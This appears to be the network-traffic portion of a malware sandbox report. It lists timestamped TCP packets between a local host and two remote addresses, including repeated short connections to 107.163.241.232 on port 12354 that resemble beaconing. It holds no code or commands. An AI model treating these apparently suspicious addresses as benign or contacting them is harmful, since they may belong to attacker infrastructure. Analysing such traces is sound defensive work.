Dec 11, 2024 16:29:29.906662941 CET	80	49189	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:29.906752110 CET	49189	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:29.907201052 CET	49189	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:29.907532930 CET	12354	49190	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:29.907607079 CET	49190	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.908067942 CET	49190	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:30.026560068 CET	80	49189	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:30.027411938 CET	12354	49190	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:31.911396980 CET	12354	49154	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:31.911464930 CET	49154	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:31.920907021 CET	49154	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:31.921807051 CET	50853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:32.020081997 CET	12354	49190	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:32.020232916 CET	49190	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:32.041135073 CET	12354	49154	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:32.041786909 CET	80	49189	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:32.041886091 CET	49189	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:32.043905973 CET	12354	50853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:32.044002056 CET	50853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:32.163444042 CET	12354	50853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:32.163944960 CET	50853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:32.186610937 CET	49190	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:32.189568043 CET	50853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:32.189568043 CET	50853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:32.318911076 CET	12354	49190	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:32.319047928 CET	12354	50853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:32.319061995 CET	12354	50853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:32.952264071 CET	50868	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:33.004952908 CET	50869	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:33.004997969 CET	443	50869	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:33.005305052 CET	50869	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:33.007611990 CET	50870	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:33.060237885 CET	50869	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:33.060252905 CET	443	50869	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:33.073229074 CET	12354	50868	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:33.073364019 CET	50868	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:33.126199961 CET	50868	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:33.129134893 CET	12354	50870	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:33.129223108 CET	50870	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:33.242861986 CET	50870	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:33.245739937 CET	12354	50868	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:33.364918947 CET	12354	50870	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:34.757822037 CET	443	50869	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:34.757905006 CET	50869	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:34.758568048 CET	443	50869	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:34.758637905 CET	50869	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:34.762149096 CET	50869	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:34.762214899 CET	443	50869	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:34.762335062 CET	443	50869	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:34.762399912 CET	50869	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:34.762423992 CET	50869	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:34.957523108 CET	49189	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:34.958405972 CET	52418	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:35.077347994 CET	80	49189	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:35.077419996 CET	49189	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:35.077907085 CET	80	52418	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:35.079339027 CET	52418	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:35.079339027 CET	52418	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:35.192953110 CET	12354	50868	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:35.193028927 CET	50868	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:35.193759918 CET	50868	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:35.194334030 CET	52752	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:35.198692083 CET	80	52418	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:35.241101980 CET	12354	50870	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:35.241204023 CET	50870	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:35.248903036 CET	50870	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:35.315282106 CET	12354	50868	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:35.316071987 CET	12354	52752	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:35.316248894 CET	52752	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:35.328454971 CET	52752	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:35.374001026 CET	12354	50870	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:35.382381916 CET	52788	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:35.454351902 CET	12354	52752	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:35.508903980 CET	12354	52788	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:35.509006023 CET	52788	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:35.555737019 CET	52788	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:35.679534912 CET	12354	52788	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:36.658572912 CET	80	52418	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:36.658850908 CET	52418	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:37.014772892 CET	52752	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:37.014903069 CET	52788	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:37.015597105 CET	52804	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:37.015639067 CET	443	52804	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:37.015691996 CET	52804	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:37.018934011 CET	52804	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:37.018944025 CET	443	52804	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:37.019088030 CET	52806	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:37.140090942 CET	52835	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:37.141963005 CET	12354	52806	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:37.142030001 CET	52806	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:37.143083096 CET	52806	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:37.259915113 CET	12354	52835	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:37.260087967 CET	52835	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:37.262607098 CET	12354	52806	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:37.264090061 CET	52835	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:37.385601044 CET	12354	52835	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:38.721549988 CET	443	52804	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:38.721652985 CET	52804	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:38.722310066 CET	443	52804	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:38.722374916 CET	52804	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:38.726358891 CET	52804	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:38.726387978 CET	443	52804	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:38.726505995 CET	443	52804	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:38.726556063 CET	52804	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:38.726572037 CET	52804	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:39.106678963 CET	52418	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:39.107103109 CET	54025	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:39.226648092 CET	80	54025	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:39.226737022 CET	54025	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:39.226843119 CET	80	52418	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:39.226891041 CET	52418	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:39.255249023 CET	12354	52806	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:39.255480051 CET	52806	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:39.295941114 CET	54025	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:39.298948050 CET	52806	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:39.299650908 CET	54029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:39.380184889 CET	12354	52835	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:39.384469986 CET	52835	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:39.415551901 CET	80	54025	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:39.418323040 CET	12354	52806	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:39.419260979 CET	12354	54029	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:39.419385910 CET	54029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:39.487162113 CET	52835	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:39.505995035 CET	54029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:39.606668949 CET	12354	52835	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:39.626468897 CET	12354	54029	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:40.488579035 CET	54070	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:40.615122080 CET	12354	54070	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:40.615211964 CET	54070	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:40.638860941 CET	54070	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:40.764087915 CET	12354	54070	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:40.861131907 CET	80	54025	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:40.861207008 CET	54025	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:40.881350994 CET	54093	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:40.881417990 CET	443	54093	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:40.881524086 CET	54093	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:40.883260965 CET	54093	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:40.883287907 CET	443	54093	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:41.022397041 CET	54093	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:41.022443056 CET	54070	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:41.022466898 CET	54029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:41.023406982 CET	54209	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:41.138587952 CET	54325	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:41.139408112 CET	54025	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:41.139837027 CET	54326	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:41.149115086 CET	12354	54209	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:41.149197102 CET	54209	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:41.149842024 CET	54209	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:41.260895014 CET	12354	54325	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:41.260992050 CET	54325	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:41.261567116 CET	54325	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:41.262343884 CET	80	54025	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:41.262413025 CET	54025	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:41.262434959 CET	80	54326	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:41.262584925 CET	54326	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:41.263258934 CET	54326	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:41.273225069 CET	12354	54209	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:41.383951902 CET	12354	54325	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:41.385272980 CET	80	54326	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:42.913034916 CET	80	54326	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:42.913108110 CET	54326	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:43.303697109 CET	12354	54209	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:43.308211088 CET	54209	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:43.382376909 CET	12354	54325	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:43.382481098 CET	54325	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:43.583844900 CET	54209	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:43.703445911 CET	12354	54209	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:43.748982906 CET	54325	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:43.750674963 CET	56038	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:43.875488997 CET	12354	54325	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:43.877000093 CET	12354	56038	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:43.877175093 CET	56038	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:44.064893961 CET	56038	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:44.184338093 CET	12354	56038	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:44.725728989 CET	56091	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:44.725783110 CET	443	56091	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:44.725840092 CET	56091	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:44.726387024 CET	56091	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:44.726402998 CET	443	56091	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:44.840919971 CET	56199	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:44.960700035 CET	12354	56199	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:44.960776091 CET	56199	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:44.961146116 CET	56199	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:45.081302881 CET	12354	56199	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:45.990082979 CET	12354	56038	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:45.990235090 CET	56038	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:45.990694046 CET	56038	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:45.991240025 CET	57129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:46.110783100 CET	12354	56038	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:46.116097927 CET	12354	57129	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:46.116214991 CET	57129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:46.116993904 CET	57129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:46.241400957 CET	12354	57129	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:46.421749115 CET	443	56091	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:46.421822071 CET	56091	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:46.422525883 CET	443	56091	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:46.422573090 CET	56091	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:46.429250956 CET	56091	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:46.429300070 CET	443	56091	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:46.429351091 CET	56091	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:46.550753117 CET	54326	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:46.551134109 CET	57632	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:46.670896053 CET	80	57632	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:46.670996904 CET	80	54326	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:46.671077967 CET	57632	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:46.671256065 CET	54326	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:46.672285080 CET	57632	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:46.792009115 CET	80	57632	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:47.067943096 CET	12354	56199	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:47.068012953 CET	56199	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:47.068809032 CET	56199	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:47.069499969 CET	57816	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:47.188014984 CET	12354	56199	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:47.188775063 CET	12354	57816	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:47.188853025 CET	57816	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:47.192955017 CET	57816	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:47.312844038 CET	12354	57816	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:48.070161104 CET	57632	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:48.070597887 CET	57816	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:48.070722103 CET	57129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:48.073220968 CET	58639	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:48.192666054 CET	12354	58639	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:48.192770004 CET	58639	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:48.194299936 CET	58639	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:48.317549944 CET	12354	58639	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:48.423275948 CET	58741	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:48.423688889 CET	58742	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:48.542974949 CET	12354	58741	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:48.543073893 CET	80	58742	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:48.543111086 CET	58741	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:48.543346882 CET	58742	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:48.543977976 CET	58741	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:48.544368029 CET	58742	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:48.663518906 CET	12354	58741	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:48.663573027 CET	80	58742	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:50.114033937 CET	80	58742	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:50.114135981 CET	58742	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:50.119658947 CET	60232	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:50.119724989 CET	443	60232	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:50.119843006 CET	60232	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:50.121421099 CET	60232	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:50.121443033 CET	443	60232	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:50.317229986 CET	12354	58639	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:50.317419052 CET	58639	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:50.317734003 CET	58639	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:50.318115950 CET	60441	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:50.436996937 CET	12354	58639	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:50.437521935 CET	12354	60441	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:50.437598944 CET	60441	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:50.440561056 CET	60441	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:50.559957027 CET	12354	60441	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:50.661284924 CET	12354	58741	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:50.661349058 CET	58741	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:50.662117958 CET	58741	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:50.662714958 CET	60671	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:50.787384033 CET	12354	58741	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:50.787884951 CET	12354	60671	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:50.787952900 CET	60671	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:50.800348997 CET	60671	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:50.919630051 CET	12354	60671	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:51.810511112 CET	443	60232	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:51.810758114 CET	60232	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:51.811328888 CET	443	60232	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:51.811481953 CET	60232	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:51.818093061 CET	60232	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:51.818181038 CET	443	60232	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:51.818367958 CET	443	60232	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:51.818509102 CET	60232	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:51.818509102 CET	60232	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:51.987027884 CET	58742	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:51.987533092 CET	61646	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:52.107213974 CET	80	61646	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:52.107256889 CET	80	58742	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:52.107330084 CET	61646	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:52.107345104 CET	58742	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:52.129125118 CET	61646	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:52.199824095 CET	60671	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:52.199875116 CET	60441	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:52.199903011 CET	61646	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:52.200704098 CET	61903	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:52.248874903 CET	80	61646	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:52.249077082 CET	61646	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:52.320224047 CET	12354	61903	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:52.320311069 CET	61903	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:52.321835041 CET	61903	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:52.334083080 CET	61986	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:52.336993933 CET	61988	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:52.441411018 CET	12354	61903	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:52.453851938 CET	12354	61986	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:52.453985929 CET	61986	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:52.455347061 CET	61986	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:52.456301928 CET	80	61988	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:52.456389904 CET	61988	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:52.457031965 CET	61988	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:52.574898958 CET	12354	61986	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:52.577195883 CET	80	61988	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:54.032133102 CET	80	61988	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:54.032270908 CET	61988	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:54.052494049 CET	63386	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:54.052553892 CET	443	63386	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:54.052609921 CET	63386	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:54.053067923 CET	63386	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:54.053082943 CET	443	63386	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:54.427733898 CET	12354	61903	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:54.427826881 CET	61903	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:54.428428888 CET	61903	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:54.429063082 CET	63794	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:54.550113916 CET	12354	61903	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:54.550137043 CET	12354	63794	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:54.550228119 CET	63794	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:54.551198006 CET	63794	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:54.568238974 CET	12354	61986	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:54.568304062 CET	61986	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:54.568881035 CET	61986	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:54.569818020 CET	63920	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:54.670923948 CET	12354	63794	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:54.695027113 CET	12354	61986	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:54.695067883 CET	12354	63920	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:54.695175886 CET	63920	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:54.695964098 CET	63920	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:54.817485094 CET	12354	63920	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:55.747806072 CET	443	63386	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:55.747900963 CET	63386	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:55.748584986 CET	443	63386	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:55.748642921 CET	63386	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:55.752140999 CET	63386	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:55.752192020 CET	443	63386	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:55.752314091 CET	443	63386	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:55.752361059 CET	63386	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:55.752382040 CET	63386	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:55.997971058 CET	61988	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:55.998403072 CET	64996	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:56.118324995 CET	80	61988	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:56.118360996 CET	80	64996	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:56.118401051 CET	61988	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:56.118477106 CET	64996	80	192.168.2.7	202.108.0.52
